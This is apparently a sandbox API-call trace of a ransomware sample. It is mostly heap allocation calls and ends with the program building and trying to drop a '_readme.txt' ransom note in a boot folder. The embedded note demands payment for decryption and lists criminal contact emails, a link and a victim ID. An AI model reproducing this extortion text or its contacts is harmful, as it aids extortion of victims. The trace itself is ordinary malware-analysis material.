HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.758] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.758] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.758] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.759] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.759] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.759] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.759] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.759] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.759] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.759] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.759] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.759] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.759] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.759] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.759] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.759] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.760] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.761] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.761] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.761] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.761] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.761] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.761] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.761] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.761] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.761] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.761] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.761] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.761] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.761] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.761] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.761] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.761] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.761] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.761] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.761] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.761] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.761] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.761] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.761] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.761] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.761] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.762] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.762] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.763] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.764] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.764] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.764] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.764] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.764] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.764] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.764] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.764] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.764] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.764] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.764] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.764] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.764] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.764] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.765] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.766] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.766] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.766] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.766] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0209.766] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.766] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.766] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.766] PathFindFileNameW (pszPath="") returned="" [0209.766] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.766] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.767] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.767] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.767] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.767] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.767] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.767] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0209.767] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0209.767] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.767] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.767] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.768] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 